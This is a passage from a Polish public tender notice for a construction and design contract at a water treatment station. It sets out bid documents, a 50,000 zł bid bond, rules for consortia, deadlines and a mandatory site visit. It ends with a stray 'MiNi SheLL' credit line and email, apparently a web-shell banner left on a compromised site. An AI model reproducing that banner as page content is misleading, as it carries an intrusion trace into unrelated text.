do<br/>IDW;<br/>2) oświadczenie o braku podstaw wykluczenia oraz spełniania warunków udziału<br/>w postępowaniu (formularz uniwersalny dla wykonawcy oraz wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia), złożone wg wzoru stanowiącego załącznik<br/>nr 2 do IDW;<br/>3) pełnomocnictwo do podpisania oferty (jeżeli dotyczy);<br/>4) pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia (jeżeli dotyczy);<br/>5) zobowiązanie podmiotu do udostępnienia zasobów i oświadczenie tego podmiotu<br/>o braku podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu (jeżeli<br/>Wykonawca polega na zasobach podmiotu udostępniającego zasoby), wg wzoru<br/>stanowiącego załącznik nr 4 do IDW (jeżeli dotyczy);<br/>6) dokument wadialny (w przypadku złożenia wadium w formie niepieniężnej)<br/>Zamawiający zaleca załączenie potwierdzenia wpłaty wadium (w przypadku złożenia<br/>wadium w formie pieniężnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wysokość wadium.<br/>Zamawiający wymaga od Wykonawców wniesienia wadium w wysokości 50 000,00 zł (słownie:<br/>pięćdziesiąt tysięcy złotych 00/100).<br/>2. Forma wadium.<br/>1) Wadium może być wnoszone według wyboru Wykonawców w jednej lub kilku<br/>następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.<br/>U. z 2024 r. poz. 419).<br/>2) W przypadku Wykonawców wspólnie składających ofertę (konsorcjów, spółek cywilnych),<br/>w treści gwarancji lub poręczeniu mają być wskazani odpowiednio: wszyscy konsorcjanci lub<br/>wspólnicy spółki.<br/>3. Termin i sposób wniesienia wadium.<br/>1) Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>2) Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek<br/>Zamawiającego: 45 1020 4115 0000 9002 0004 2333 z adnotacją: „Wadium – GR.271.30.2024”.<br/>1) W przypadku wnoszenia wadium w pieniądzu, Zamawiający uzna je za wniesione<br/>skutecznie jedynie w przypadku wpływu pieniędzy na rachunek bankowy Zamawiającego<br/>przed upływem terminu składania ofert;<br/>2) Wadium wniesione w formie niepieniężnej, tj. w formie gwarancji lub poręczenia musi być<br/>czynnością jednostronnie zobowiązującą, mieć taką samą płynność jak wadium wniesione<br/>w pieniądzu, obejmować odpowiedzialność za wszystkie przypadki powodujące zatrzymanie<br/>wadium przez Zamawiającego, określone w art. 98 ust. 6 ustawy Pzp.<br/>3) Wadium wniesione w formie niepieniężnej musi zawierać w swojej treści:<br/>− nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty kwoty<br/>wadium na rzecz Zamawiającego oraz<br/>− termin obowiązywania gwarancji (poręczenia), który nie może być krótszy niż termin<br/>związania ofertą.<br/>4) W przypadku wyboru formy niepieniężnej, wadium Wykonawca zobowiązany jest wnieść<br/>przy użyciu środków komunikacji elektronicznej w formie oryginalnego elektronicznego<br/>dokumentu wadialnego (np. e-gwarancji bankowej lub ubezpieczeniowej) opatrzonego<br/>kwalifikowanym podpisem elektronicznym osoby upoważnionej do wystawienia dokumentu<br/>wadialnego (np. e- gwarancji bankowej lub ubezpieczeniowej).<br/>5) Niedopuszczalne jest złożenie skanu dokumentu wadialnego (np. e- gwarancji bankowej lub<br/>ubezpieczeniowej) opatrzonego kwalifikowanym podpisem elektronicznym.<br/>6) W przypadku wyboru formy niepieniężnej, wadium Wykonawca zobowiązany jest złożyć<br/>dokument wadialny wraz z ofertą w ten sam sposób co ofertę, tj. przy użyciu środków<br/>komunikacji elektronicznej, jednakże w wydzielonym odrębnym i oznaczonym pliku (np:<br/>.pdf),<br/>4. Zwrot i zatrzymanie wadium.<br/>Zwrot lub zatrzymanie wadium następuje w przypadkach określonych w art. 98 u.p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) W przypadku, o którym mowa w pkt 1, Wykonawcy ustanawiają Pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3) Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia; Wszelka korespondencja prowadzona będzie wyłącznie<br/>z Pełnomocnikiem.<br/>4) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do<br/>realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia wskazują w treści oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>5) Warunek w zakresie doświadczenia, dotyczący zdolności technicznej lub zawodowej musi<br/>potwierdzać co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>6) Oferta musi być podpisana w taki sposób, by poprawnie zobowiązywała wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7) Jeżeli w postępowaniu zostanie wybrana oferta wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców.<br/>8) Zamawiający nie zastrzega obowiązku osobistego wykonania, przez poszczególnych<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, kluczowych zadań<br/>dotyczących zamówień na roboty budowlane lub usługi.<br/>9) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>10) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania<br/>umowy.<br/>11) Wypełniając formularz oferty należy wpisać dane (nazwa, adres itd.) Pełnomocnika (Lidera)<br/>oraz wszystkich Wykonawców wspólnie ubiegających się o zamówienie. W innych<br/>dokumentach (załączniki) powołujących się na Wykonawcę w miejscu np. nazwa, adres<br/>Wykonawcy, należy wpisać dane dotyczące Pełnomocnika (Lidera) i Wykonawcy, którego<br/>dany dokument (załącznik) dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie ze wzorem umowy stanowiącym załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-26 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/952925</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-26 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-25</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zadanie realizowane jest w ramach operacji dofinansowanej z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych i podlegającej wymogom wynikającym z regulaminu oraz zasad programu, w trybie powyżej 12 miesięcy, wstępna Promesa NR Edycja8/2023/8058/PolskiLad.<br/><br/><br/><br/>Zamawiający wymaga przeprowadzenie przez wykonawców wizji lokalnej.<br/>Przed złożeniem oferty Wykonawca przeprowadzi obowiązkową wizytację Terenu Budowy oraz jego otoczenia w celu oceny, na własną odpowiedzialność, koszt i ryzyko, wszystkich czynników koniecznych do przygotowania rzetelnej oferty, obejmującej wszelkie niezbędne prace przygotowawcze, zasadnicze i towarzyszące zarówno do prowadzenia robót budowlano- montażowych, jak i przygotowania projektu do uzyskania pozwolenia na budowę. <br/>Wizja lokalna przeprowadzona będzie w obecności Zamawiającego na terenie Stacji Uzdatniania Wody.<br/>Zamawiający wyznacza następujący termin wizji:<br/>1) w dniu 30.07.2024 r. o godzinie 11.00

Creat By MiNi SheLL
Email: jattceo@gmail.com